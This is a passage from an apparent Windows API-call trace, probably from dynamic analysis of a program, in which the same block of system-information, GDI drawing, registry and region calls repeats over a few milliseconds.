dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.478] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.478] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.478] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.478] BeginPath (hdc=0x0) returned 0 [0017.478] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.478] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.478] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.478] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.478] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.479] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd304027d [0017.479] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdd040713 [0017.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104094f [0017.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040950 [0017.479] CombineRgn (hrgnDst=0x104094f, hrgnSrc1=0xd304027d, hrgnSrc2=0xdd040713, iMode=1) returned 1 [0017.479] CombineRgn (hrgnDst=0x1040950, hrgnSrc1=0xd304027d, hrgnSrc2=0xdd040713, iMode=4) returned 2 [0017.479] CreateSolidBrush (color=0xff) returned 0x210094e [0017.479] CreateSolidBrush (color=0xff0000) returned 0x1100951 [0017.479] DeleteObject (ho=0x1100951) returned 1 [0017.479] DeleteObject (ho=0xdd040713) returned 1 [0017.479] DeleteObject (ho=0xd304027d) returned 1 [0017.479] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.479] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.479] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.479] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.479] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.479] BeginPath (hdc=0x0) returned 0 [0017.479] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.479] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.479] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.479] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.479] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.479] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.479] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.479] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.479] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xde040713 [0017.480] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd404027d [0017.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040952 [0017.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040953 [0017.480] CombineRgn (hrgnDst=0x1040952, hrgnSrc1=0xde040713, hrgnSrc2=0xd404027d, iMode=1) returned 1 [0017.480] CombineRgn (hrgnDst=0x1040953, hrgnSrc1=0xde040713, hrgnSrc2=0xd404027d, iMode=4) returned 2 [0017.480] CreateSolidBrush (color=0xff) returned 0x2100951 [0017.480] CreateSolidBrush (color=0xff0000) returned 0x1100954 [0017.480] DeleteObject (ho=0x1100954) returned 1 [0017.480] DeleteObject (ho=0xd404027d) returned 1 [0017.480] DeleteObject (ho=0xde040713) returned 1 [0017.480] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.480] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.480] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.480] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.480] BeginPath (hdc=0x0) returned 0 [0017.480] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.480] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.480] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.480] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.480] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.480] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd504027d [0017.480] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdf040713 [0017.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040955 [0017.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040956 [0017.480] CombineRgn (hrgnDst=0x1040955, hrgnSrc1=0xd504027d, hrgnSrc2=0xdf040713, iMode=1) returned 1 [0017.481] CombineRgn (hrgnDst=0x1040956, hrgnSrc1=0xd504027d, hrgnSrc2=0xdf040713, iMode=4) returned 2 [0017.481] CreateSolidBrush (color=0xff) returned 0x2100954 [0017.481] CreateSolidBrush (color=0xff0000) returned 0x1100957 [0017.481] DeleteObject (ho=0x1100957) returned 1 [0017.481] DeleteObject (ho=0xdf040713) returned 1 [0017.481] DeleteObject (ho=0xd504027d) returned 1 [0017.481] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.481] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.481] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.481] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.481] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.481] BeginPath (hdc=0x0) returned 0 [0017.481] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.481] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.481] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.481] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.481] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.481] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.481] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.481] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.481] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe0040713 [0017.481] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd604027d [0017.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040958 [0017.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040959 [0017.481] CombineRgn (hrgnDst=0x1040958, hrgnSrc1=0xe0040713, hrgnSrc2=0xd604027d, iMode=1) returned 1 [0017.481] CombineRgn (hrgnDst=0x1040959, hrgnSrc1=0xe0040713, hrgnSrc2=0xd604027d, iMode=4) returned 2 [0017.481] CreateSolidBrush (color=0xff) returned 0x2100957 [0017.481] CreateSolidBrush (color=0xff0000) returned 0x110095a [0017.481] DeleteObject (ho=0x110095a) returned 1 [0017.481] DeleteObject (ho=0xd604027d) returned 1 [0017.481] DeleteObject (ho=0xe0040713) returned 1 [0017.481] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.482] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.482] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.482] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.482] BeginPath (hdc=0x0) returned 0 [0017.482] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.482] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.482] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.482] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.482] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.482] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd704027d [0017.482] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe1040713 [0017.482] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104095b [0017.482] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104095c [0017.482] CombineRgn (hrgnDst=0x104095b, hrgnSrc1=0xd704027d, hrgnSrc2=0xe1040713, iMode=1) returned 1 [0017.482] CombineRgn (hrgnDst=0x104095c, hrgnSrc1=0xd704027d, hrgnSrc2=0xe1040713, iMode=4) returned 2 [0017.482] CreateSolidBrush (color=0xff) returned 0x210095a [0017.482] CreateSolidBrush (color=0xff0000) returned 0x110095d [0017.482] DeleteObject (ho=0x110095d) returned 1 [0017.482] DeleteObject (ho=0xe1040713) returned 1 [0017.482] DeleteObject (ho=0xd704027d) returned 1 [0017.482] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.482] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.482] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.483] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.483] BeginPath (hdc=0x0) returned 0 [0017.483] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.483] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.483] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.483] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.483] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.483] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.483] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.483] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.483] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe2040713 [0017.483] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd804027d [0017.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104095e [0017.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104095f [0017.483] CombineRgn (hrgnDst=0x104095e, hrgnSrc1=0xe2040713, hrgnSrc2=0xd804027d, iMode=1) returned 1 [0017.483] CombineRgn (hrgnDst=0x104095f, hrgnSrc1=0xe2040713, hrgnSrc2=0xd804027d, iMode=4) returned 2 [0017.483] CreateSolidBrush (color=0xff) returned 0x210095d [0017.483] CreateSolidBrush (color=0xff0000) returned 0x1100960 [0017.483] DeleteObject (ho=0x1100960) returned 1 [0017.483] DeleteObject (ho=0xd804027d) returned 1 [0017.483] DeleteObject (ho=0xe2040713) returned 1 [0017.483] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.483] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.483] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.484] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.484] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.484] BeginPath (hdc=0x0) returned 0 [0017.484] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.484] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.484] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.484] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.484] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.484] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd904027d [0017.484] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe3040713 [0017.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040961 [0017.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040962 [0017.484] CombineRgn (hrgnDst=0x1040961, hrgnSrc1=0xd904027d, hrgnSrc2=0xe3040713, iMode=1) returned 1 [0017.484] CombineRgn (hrgnDst=0x1040962, hrgnSrc1=0xd904027d, hrgnSrc2=0xe3040713, iMode=4) returned 2 [0017.484] CreateSolidBrush (color=0xff) returned 0x2100960 [0017.484] CreateSolidBrush (color=0xff0000) returned 0x1100963 [0017.484] DeleteObject (ho=0x1100963) returned 1 [0017.484] DeleteObject (ho=0xe3040713) returned 1 [0017.484] DeleteObject (ho=0xd904027d) returned 1 [0017.484] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.484] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.484] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.484] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.484] BeginPath (hdc=0x0) returned 0 [0017.484] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.484] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.484] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.485] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.485] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.485] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.485] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe4040713 [0017.485] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xda04027d [0017.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040964 [0017.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040965 [0017.485] CombineRgn (hrgnDst=0x1040964, hrgnSrc1=0xe4040713, hrgnSrc2=0xda04027d, iMode=1) returned 1 [0017.485] CombineRgn (hrgnDst=0x1040965, hrgnSrc1=0xe4040713, hrgnSrc2=0xda04027d, iMode=4) returned 2 [0017.485] CreateSolidBrush (color=0xff) returned 0x2100963 [0017.485] CreateSolidBrush (color=0xff0000) returned 0x1100966 [0017.485] DeleteObject (ho=0x1100966) returned 1 [0017.485] DeleteObject (ho=0xda04027d) returned 1 [0017.485] DeleteObject (ho=0xe4040713) returned 1 [0017.485] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.485] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.485] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.485] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.485] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.485] BeginPath (hdc=0x0) returned 0 [0017.485] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.485] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.485] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.485] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.485] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.485] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.485] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.485] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.486] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdb04027d [0017.486] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe5040713 [0017.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040967 [0017.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040968 [0017.486] CombineRgn (hrgnDst=0x1040967, hrgnSrc1=0xdb04027d, hrgnSrc2=0xe5040713, iMode=1) returned 1 [0017.486] CombineRgn (hrgnDst=0x1040968, hrgnSrc1=0xdb04027d, hrgnSrc2=0xe5040713, iMode=4) returned 2 [0017.486] CreateSolidBrush (color=0xff) returned 0x2100966 [0017.486] CreateSolidBrush (color=0xff0000) returned 0x1100969 [0017.486] DeleteObject (ho=0x1100969) returned 1 [0017.486] DeleteObject (ho=0xe5040713) returned 1 [0017.486] DeleteObject (ho=0xdb04027d) returned 1 [0017.486] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.486] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.486] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.486] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.486] BeginPath (hdc=0x0) returned 0 [0017.486] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.486] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 